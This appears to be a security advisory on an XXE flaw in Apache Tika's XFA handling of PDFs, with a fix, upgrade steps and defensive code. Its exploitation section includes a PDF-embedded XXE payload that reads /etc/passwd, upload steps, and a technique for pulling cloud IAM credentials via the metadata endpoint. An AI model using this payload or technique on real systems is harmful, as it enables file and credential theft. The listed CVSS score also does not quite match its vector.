Feb 10, 2026
Critical XXE in Apache Tika (tika-core < 3.2.2). Attackers can embed malicious XML payloads inside PDF XFA forms. When Tika parses the PDF to extract metadata or text, the XML payload triggers, allowing file read (LFI) or network requests (SSRF). Upgrade `tika-core` immediately.
Apache Tika, the ubiquitously trusted content analysis toolkit, suffers from a critical XML External Entity (XXE) vulnerability within its core library. Specifically affecting how Tika handles XFA (XML Forms Architecture) data embedded within PDF files, this flaw allows attackers to exfiltrate local files or perform Server-Side Request Forgery (SSRF) simply by submitting a malicious document. This is a scope expansion of the earlier CVE-2025-54988, revealing that the rot wasn't just in the PDF module, but deep in `tika-core`.
Apache Tika is the silent workhorse of the enterprise world. It is the library that powers Solr, Elasticsearch, and thousands of corporate Content Management Systems (CMS). Its job is simple but thankless: take a binary blob—be it a Word doc, a PDF, or an image—and extract the text and metadata. It is the "universal translator" of file formats.
But here is the problem with being a universal translator: you have to speak everyone's language, even the dangerous ones. And no language is quite as dangerous in the Java ecosystem as XML. Tika is designed to trust input, parse it, and return structured data. When you feed it a PDF, Tika doesn't just read the text; it looks for forms, metadata, and embedded objects.
This vulnerability exploits a specific feature in PDFs called XFA (XML Forms Architecture). XFA is essentially a way to embed a dynamic XML document inside a static PDF. If Tika blindly passes that embedded XML to a parser that hasn't been strictly disciplined, you get XXE. And in this case, the disciplinarian—tika-core—was asleep at the wheel.
To understand this bug, you have to appreciate the comedy of errors that is XML parsing in Java. By default, Java XML parsers are often promiscuous—they will happily resolve external entities defined in a DTD (Document Type Definition). This allows an XML file to say, "Hey, before you parse me, go fetch the contents of /etc/passwd and stick it in this variable."
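To make that default behavior concrete, here is a minimal sketch that parses an entity-bearing document with an unconfigured `DocumentBuilderFactory`. The class and method names (`DefaultParserDemo`, `parseWithDefaults`, `xxeDocumentFor`) are hypothetical, and a harmless temp file stands in for /etc/passwd. This is an illustration of the general JAXP pitfall, not Tika's actual code.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

public class DefaultParserDemo {

    /** Parses XML with an unconfigured factory and returns the root element's text. */
    static String parseWithDefaults(String xml) throws Exception {
        // No hardening features are set: this is the risky default configuration.
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        Document doc = factory.newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return doc.getDocumentElement().getTextContent();
    }

    /** Builds a document whose external entity points at the given local file. */
    static String xxeDocumentFor(Path target) {
        return "<?xml version=\"1.0\"?>\n"
             + "<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"" + target.toUri() + "\"> ]>\n"
             + "<data>&xxe;</data>";
    }

    public static void main(String[] args) throws Exception {
        // A throwaway file plays the role of the sensitive target.
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.writeString(secret, "TOP-SECRET-CONTENT");
        try {
            System.out.println(parseWithDefaults(xxeDocumentFor(secret)));
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

On a stock JDK with default JAXP settings, the returned text is expected to contain the temp file's contents, which is exactly the behavior an attacker relies on.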
This vulnerability is actually the "Director's Cut" of a previous bug, CVE-2025-54988. Originally, developers thought the issue was isolated to the tika-pdf-module. They patched it there. But as security researchers dug deeper, they realized the rot went further down. The unsafe XML configuration wasn't just in the PDF handling logic; it was in the tika-core utility that the PDF module relied on.
This means if you updated your PDF parser but left tika-core on an older version, you were still vulnerable. It’s like locking your front door (the PDF module) but realizing your house frame (the Core) is made of cheese. The specific failure was in not setting the XMLConstants.FEATURE_SECURE_PROCESSING correctly or, more likely, failing to explicitly disable DOCTYPE declarations when processing the extracted XFA stream.
Let's look at what typically goes wrong in these scenarios. In Java, instantiating a SAXParserFactory or DocumentBuilderFactory looks innocent enough, but it's a loaded gun if you don't toggle the safety catch.
The Vulnerable Pattern (Conceptual):

```java
// Inside tika-core logic handling XFA
SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setNamespaceAware(true);
// Missing: The lines that tell the parser to ignore DTDs
SAXParser parser = factory.newSAXParser();
parser.parse(xfaInputStream, handler);
```

When Tika encounters a PDF with XFA data, it extracts the XML stream and feeds it to this parser. Because the disallow-doctype-decl feature isn't set, the parser obeys the attacker's DTD.
The Fix (Apache Tika 3.2.2):
The remediation involves rigorously locking down the parser factory in tika-core. The patch ensures that any XML parsing initiated by this utility explicitly forbids external entities.

```java
// The Hardened Configuration
SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
// The critical line that kills XXE dead:
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
```

This change in tika-core propagates safety to all modules consuming these utilities, finally closing the hole that the previous CVE missed.
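If you want to see what those feature flags buy you, the following self-contained sketch applies them to a `SAXParserFactory` and checks whether a document carrying a DOCTYPE is refused. The names `HardenedParserDemo`, `newHardenedFactory`, and `isRejected` are hypothetical, and the sketch assumes the JDK's built-in Xerces-based parser, which recognizes these feature URIs. It is not the Tika patch itself.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

public class HardenedParserDemo {

    /** Builds a factory with the hardening features discussed in the article. */
    static SAXParserFactory newHardenedFactory() throws Exception {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        factory.setNamespaceAware(true);
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Refuse any document that declares a DOCTYPE at all.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth: also switch off external entities and external DTD loading.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return factory;
    }

    /** Returns true if the hardened parser refuses the document. */
    static boolean isRejected(String xml) throws Exception {
        try {
            newHardenedFactory().newSAXParser().parse(
                    new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)),
                    new DefaultHandler());
            return false; // parsed cleanly
        } catch (SAXException e) {
            return true;  // the parser raised a fatal error, e.g. on the DOCTYPE
        }
    }

    public static void main(String[] args) throws Exception {
        String malicious = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>"
                + "<data>&xxe;</data>";
        System.out.println("malicious rejected: " + isRejected(malicious));
        System.out.println("benign rejected:    " + isRejected("<data>ok</data>"));
    }
}
```

Rejecting the DOCTYPE outright is the bluntest of the five settings, which is why it is usually listed first: the parser stops before it ever looks at an entity declaration.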
Exploiting this requires a bit of "Inception." We aren't sending an XML file directly; we are wrapping an XML payload inside a PDF envelope. The target (Tika) will unwrap it for us.
Step 1: The Container
We create a valid PDF structure. Inside the PDF Catalog, we define an /AcroForm dictionary that references an /XFA stream. This tells the PDF reader (or parser), "Hey, the form data for this document is stored in this XML blob."
Step 2: The Payload
Inside that XFA stream, we inject the classic XXE payload. Here is a simplified view of the malicious object structure:

```
5 0 obj
<< /XFA 6 0 R >> % Reference to the XML stream
endobj
6 0 obj
<< /Length 123 >>
stream
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdp:xdp [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<template>
<field name="stealing_your_data">
<value><text>&xxe;</text></value>
</field>
</template>
</xdp:xdp>
endstream
endobj
```

Step 3: The Trigger
We upload this PDF to a Tika endpoint (e.g., PUT /tika). Tika accepts the PDF, parses the structure, finds the XFA stream, and passes it to its XML parser. The parser sees &xxe;, resolves it to the contents of /etc/passwd, and places that text into the <value> field.
Step 4: The Exfiltration
Tika then returns the "text content" of the PDF to the user (or logs it, or indexes it). The attacker simply reads the response body, and there, amidst the PDF metadata, is the content of /etc/passwd.
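For defenders who want a quick triage pass over a pile of uploads, the structure described in the steps above suggests a crude heuristic: flag any PDF whose raw bytes contain both an /XFA reference and a DTD or entity declaration. The sketch below does only that. The class and method names (`XfaTriage`, `looksLikeXfaXxe`) are hypothetical, and the check assumes the XFA stream is stored uncompressed; a compressed or otherwise encoded stream will slip straight past it, so treat this as a log-grepping aid, not a mitigation.

```java
import java.nio.charset.StandardCharsets;

public class XfaTriage {

    /**
     * Rough heuristic: true if the raw PDF bytes mention /XFA and also
     * contain a DOCTYPE or ENTITY declaration in plain text.
     */
    static boolean looksLikeXfaXxe(byte[] pdfBytes) {
        // ISO-8859-1 maps every byte to one char, so binary content cannot break decoding.
        String raw = new String(pdfBytes, StandardCharsets.ISO_8859_1);
        boolean hasXfa = raw.contains("/XFA");
        boolean hasDtd = raw.contains("<!DOCTYPE") || raw.contains("<!ENTITY");
        return hasXfa && hasDtd;
    }

    public static void main(String[] args) {
        String suspicious = "5 0 obj\n<< /XFA 6 0 R >>\nendobj\n6 0 obj\nstream\n"
                + "<!DOCTYPE xdp:xdp [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n"
                + "endstream\nendobj\n";
        System.out.println(looksLikeXfaXxe(suspicious.getBytes(StandardCharsets.ISO_8859_1)));
    }
}
```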
An XXE in a library like Tika is catastrophic because of where Tika lives. It is rarely sitting on a user's laptop; it is usually deployed in the backend of massive data pipelines.
1. Cloud Metadata Theft (SSRF):
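If Tika is running in AWS, GCP, or Azure, an attacker may not care about /etc/passwd. On AWS, for example, they can point the entity at http://169.254.169.254/latest/meta-data/iam/security-credentials/ to list the instance's IAM role, then request that role's temporary credentials from the same path (this works where the metadata service answers plain GET requests, as with IMDSv1). With those keys, they can reach whatever the role can, including your buckets.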
2. Denial of Service (Billion Laughs):
Even if data exfiltration is blocked, an attacker can use the "Billion Laughs" attack (nested entity expansion, where each entity expands to several copies of the one before it) to try to consume all memory on the Tika server, crashing the indexing pipeline for the entire organization.
3. Internal Network Scanning:
Blind XXE can be used to scan internal ports. The Tika server acts as a proxy, allowing an external attacker to probe the internal network for open services (Redis, Elasticsearch, etc.).
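The Billion Laughs item is easy to reproduce at a safe scale. The sketch below builds a small nested-entity document and feeds it to a parser with `XMLConstants.FEATURE_SECURE_PROCESSING` enabled. The names `EntityExpansionDemo`, `buildNestedEntityDocument`, and `isExpansionRejected` are hypothetical, and the behavior shown assumes the JDK's built-in parser, which enforces an entity expansion limit when secure processing is on. Other parser implementations may behave differently.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

public class EntityExpansionDemo {

    /** Builds a document where each entity expands to ten copies of the previous one. */
    static String buildNestedEntityDocument(int levels) {
        StringBuilder sb = new StringBuilder("<?xml version=\"1.0\"?>\n<!DOCTYPE lolz [\n");
        sb.append("<!ENTITY lol0 \"lol\">\n");
        for (int i = 1; i <= levels; i++) {
            sb.append("<!ENTITY lol").append(i).append(" \"");
            for (int j = 0; j < 10; j++) {
                sb.append("&lol").append(i - 1).append(';');
            }
            sb.append("\">\n");
        }
        sb.append("]>\n<lolz>&lol").append(levels).append(";</lolz>");
        return sb.toString();
    }

    /** Returns true if a secure-processing parser aborts on the document. */
    static boolean isExpansionRejected(String xml) throws Exception {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        try {
            factory.newSAXParser().parse(
                    new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)),
                    new DefaultHandler());
            return false;
        } catch (SAXException e) {
            return true; // the parser gave up, e.g. because an expansion limit was hit
        }
    }

    public static void main(String[] args) throws Exception {
        // Six levels means roughly a million expansions: far past the JDK limit,
        // but only a few megabytes of text if no limit were applied.
        System.out.println(isExpansionRejected(buildNestedEntityDocument(6)));
    }
}
```

Six levels is deliberately modest. The classic payload uses more, which is where the "billion" comes from, and a parser with no limit at all would try to materialize every one of those expansions in memory.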
This is a mandatory update. You cannot configure your way out of this easily without recompiling code.
Immediate Action:
Update your dependencies. You need tika-core version 3.2.2 or higher. If you are using a build tool like Maven, check your dependency tree (mvn dependency:tree). You might have updated tika-parsers but still be pulling in an old tika-core transitively. Explicitly force the version:

```xml
<dependency>
  <groupId>org.apache.tika</groupId>
  <artifactId>tika-core</artifactId>
  <version>3.2.2</version>
</dependency>
```

Legacy Users (1.x branch):
The 1.x branch is End-of-Life (EOL) but widely used. The tika-parsers module in 1.x is vulnerable. There is no official fix for 1.x. You must migrate to the 3.x branch. If you cannot migrate, you are sitting on a time bomb. Your only mitigation is to firewall the Tika service and ensure it cannot make outbound connections, though this does not stop local file theft.
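If you are auditing many services, a tiny helper can sort the tika-core versions you find in your dependency trees into "affected" and "not affected". The sketch below assumes the affected range for tika-core is 1.13 through 3.2.1, as listed in this advisory. The class and method names (`TikaCoreVersionCheck`, `isAffected`) are hypothetical, and qualifiers such as `-BETA` are simply dropped before comparison, which is a simplification.

```java
public class TikaCoreVersionCheck {

    /** Parses "major.minor.patch" into three ints; missing parts count as 0. */
    static int[] parse(String version) {
        String core = version.split("-", 2)[0]; // drop qualifiers such as -BETA (simplification)
        String[] parts = core.split("\\.");
        int[] nums = new int[3];
        for (int i = 0; i < 3 && i < parts.length; i++) {
            nums[i] = Integer.parseInt(parts[i]);
        }
        return nums;
    }

    /** Compares two versions numerically, component by component. */
    static int compare(String a, String b) {
        int[] x = parse(a);
        int[] y = parse(b);
        for (int i = 0; i < 3; i++) {
            if (x[i] != y[i]) {
                return Integer.compare(x[i], y[i]);
            }
        }
        return 0;
    }

    /** True if the version falls in the range this advisory lists for tika-core. */
    static boolean isAffected(String tikaCoreVersion) {
        return compare(tikaCoreVersion, "1.13") >= 0
            && compare(tikaCoreVersion, "3.2.2") < 0;
    }

    public static void main(String[] args) {
        for (String v : new String[] {"1.12", "1.13", "2.9.2", "3.2.1", "3.2.2"}) {
            System.out.println(v + " affected: " + isAffected(v));
        }
    }
}
```

Feed it the versions reported by `mvn dependency:tree` rather than the versions you think you declared, since the transitive copy is the one that bites.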
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

| Product | Affected Versions | Fixed Version |
|---|---|---|
| Apache Tika Core (Apache Software Foundation) | 1.13 - 3.2.1 | 3.2.2 |
| Apache Tika PDF Module (Apache Software Foundation) | 2.0.0 - 3.2.1 | 3.2.2 |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-611 |
| Attack Vector | Network (via File Upload) |
| CVSS | 8.4 (High) |
| EPSS Score | 2.73% (High Percentile) |
| Impact | Information Disclosure / SSRF |
| Exploit Status | PoC Available / Active |
| Patch Status | Fixed in 3.2.2 |
The software processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.